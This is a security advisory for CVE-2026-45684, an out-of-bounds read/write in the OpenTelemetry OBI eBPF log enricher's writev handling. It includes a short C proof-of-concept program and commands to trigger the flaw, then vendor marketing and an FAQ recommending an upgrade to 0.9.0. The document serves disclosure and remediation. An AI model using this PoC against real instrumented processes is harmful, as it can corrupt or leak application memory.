Summary
OBI's log enricher mishandles writev buffers by reading only the first iovec entry but using the total iov_iter.count as the copy length. When log injection is enabled, a crafted multi-segment writev call can make OBI read and overwrite memory beyond the first segment.
Details
In bpf/logenricher/logenricher.c#L50, __fill_iov resolves only one struct iovec, specifically iov_ctx.iov[0] for ITER_IOVEC. The returned iov therefore describes only the first write segment.
However, __write later uses const size_t count = BPF_CORE_READ(from, count);, which is the total byte count across all segments in the iterator. That total is stored in e->len and used in bpf_probe_read_user(e->log, e->len, iov.iov_base) and bpf_probe_write_user(iov.iov_base, zero, to_write).
If count exceeds iov.iov_len, OBI reads and then zeroes memory past the end of the first segment. In practice, this can corrupt adjacent application buffers, leak memory into log events, and in some layouts destabilize the instrumented process.
PoC
Local testing with a minimal ASan harness reproduced the same out-of-bounds read/write condition as the vulnerable writev path.
Use a vulnerable build with the log enricher enabled.
git checkout v0.7.0
make build
Create a program that performs a two-element writev, where the first buffer is short and the second is large:
// save as /tmp/writev-poc.c
#define _GNU_SOURCE
#include <sys/uio.h>
#include <unistd.h>
#include <string.h>
int main(void) {
char a[8] = "HELLO\n";
char b[256];
memset(b, 'B', sizeof(b));
struct iovec iov[2];
iov[0].iov_base = a;
iov[0].iov_len = sizeof(a);
iov[1].iov_base = b;
iov[1].iov_len = sizeof(b);
for (;;) {
writev(1, iov, 2);
usleep(10000);
}
}
Compile and run it:
cc -O2 -o /tmp/writev-poc /tmp/writev-poc.c
/tmp/writev-poc >/dev/null
Attach OBI with log enrichment enabled to the running process:
PID=$(pgrep -f /tmp/writev-poc)
sudo ./bin/obi --pid "$PID"
On a vulnerable build, OBI copies iov_iter.count bytes starting from iov[0].iov_base, even though iov[0] is only 8 bytes long. Depending on allocator layout, you will see one of the following:
- log events that include bytes beyond
HELLO\n - corrupted stdout content because OBI zeroed memory beyond the first iovec
- process instability or a crash
The issue is easiest to observe under a debugger or with ASan-enabled builds of the target program, but those are not required.
Impact
This is a memory safety flaw in the log-enrichment eBPF path. It affects deployments that enable log injection and instrument applications that write logs through writev. An attacker who can trigger the vulnerable local writev pattern inside the instrumented process can cause memory corruption or disclosure in that process. The most direct effects are corrupted output and adjacent-memory disclosure, with process instability possible if the overwrite lands on sensitive state.
A write operation targets a memory location beyond the intended buffer boundary. Typical impact: memory corruption, crash, or arbitrary code execution.
CVE-2026-45684 has a CVSS score of 4.9 (Medium). The vector is requires local access, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-45684? CVE-2026-45684 is a medium-severity out-of-bounds write vulnerability in go.opentelemetry.io/obi (go), affecting versions >= 0.7.0, < 0.9.0. It is fixed in 0.9.0. A write operation targets a memory location beyond the intended buffer boundary.
- How severe is CVE-2026-45684? CVE-2026-45684 has a CVSS score of 4.9 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of go.opentelemetry.io/obi are affected by CVE-2026-45684? go.opentelemetry.io/obi (go) versions >= 0.7.0, < 0.9.0 is affected.
- Is there a fix for CVE-2026-45684? Yes. CVE-2026-45684 is fixed in 0.9.0. Upgrade to this version or later.
- Is CVE-2026-45684 exploitable, and should I be worried? Whether CVE-2026-45684 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-45684 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-45684? Upgrade
go.opentelemetry.io/obito 0.9.0 or later.